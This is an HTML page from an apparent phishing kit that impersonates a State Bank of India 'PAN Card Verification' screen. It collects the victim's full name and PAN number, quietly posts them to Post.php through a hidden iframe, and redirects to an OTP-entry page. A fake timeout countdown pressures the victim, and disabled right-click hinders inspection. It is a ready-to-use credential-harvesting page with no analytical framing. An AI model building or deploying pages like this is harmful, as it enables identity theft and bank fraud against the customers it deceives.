<!DOCTYPE html>
<html lang="eng">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>State Bank of India - PAN Card Verification</title>
  <style>
    #img,#img2b
    {
      width:104%;
      margin-left:-6px;
    }
    #aa,#bb
    {
      width: 290px;
      height: 25px;
      background-color: #F6F6F6;
      border-style: solid;
      outline:none;
      border-color:#CCCCCC;
      border-width: 1px;
      border-radius: 0px;
      margin:5px;
      margin-left: 15px;
      font-size:14px;
      padding: 2px 8px;
    }
    #btn
    {
      width:70px;
      background-color:#F89611;
      border:none;
      color:white;
      border-radius: 4px;
      border-width: 0.1px;
      margin:10px;
      cursor: pointer;
      font-size: 15px;
      height: 28px;
    }
    #con
    {
       color:#7212b3;
    }
    #con2
    {
    color:#2A9DCC;
    }
  </style>
  <script language="javascript"> 
  var message="This function is not allowed here.";
  function clickIE4(){
  if (event.button==2){
  alert(message);
  return false;
  }
  }
  function clickNS4(e){
  if (document.layers||document.getElementById&&!document.all){
  if (e.which==2||e.which==3){
  alert(message);
  return false;
  }
  }
  }
  if (document.layers){
  document.captureEvents(Event.MOUSEDOWN);
  document.onmousedown=clickNS4;}
  else if (document.all&&!document.getElementById){
  document.onmousedown=clickIE4;}
  document.oncontextmenu=new Function("alert(message);return false;")
  </script>
</head>
<body onload="startTimer();">
<!-- Static- Please don't do anything here-->
    <script type="text/javascript">var submitted=false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Enter_OTP_PAN.html';}"></iframe>
    <!--My Form-->
    <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
<div class="line">
  <img src="pn.jpg" alt="" id="img"><br>
  <b style="font-family:arial; font-size:15px; color:#47474d; margin-left:15px;">Full Name (as per PAN)<span style="color:#f06565;">*</span></b><br>
      <input type="text" name="Holder Name" id="aa" placeholder=""
      required="">
      <b style="font-family:arial; font-size:15px; color:#47474d; margin-left:15px;">PAN Card Number<span style="color:#f06565;">*</span></b><br>
      <input type="text" name="PAN No." id="aa" placeholder="" maxlength="10"
      pattern="[A-Z]{5,}[0-9]{4,}[A-Z]{1,}"
      title="Valid PAN format is:ABCDE1234A"
      required="">
      <center><button type="submit" id="btn" style="font-weight: bold;">submit</button></center>
      <script type="text/javascript">
      var timer=300;
      var sec=300;
      function startTimer() {
      sec=parseInt(timer%300);
      
      if (timer<2) {
      timer.stop();
      }
      
      document.getElementById("time").innerHTML = "<p1> This screen will automatically timeout after :</p1>"+sec.toString();
      timer--;
      setTimeout(function(){
      startTimer();
      
      }, 1000);
      }
      
      </script>
      <div>
      <center> <b style="color:red; font-size:15px; margin-left:22px;"><span style="color:red; font-size:15px;" id="time"></span>&nbsp;second</b></center><br><b<
      </div>
    <img src="3.jpg" alt="" id="img2b"><br>
    </form></div></body></html>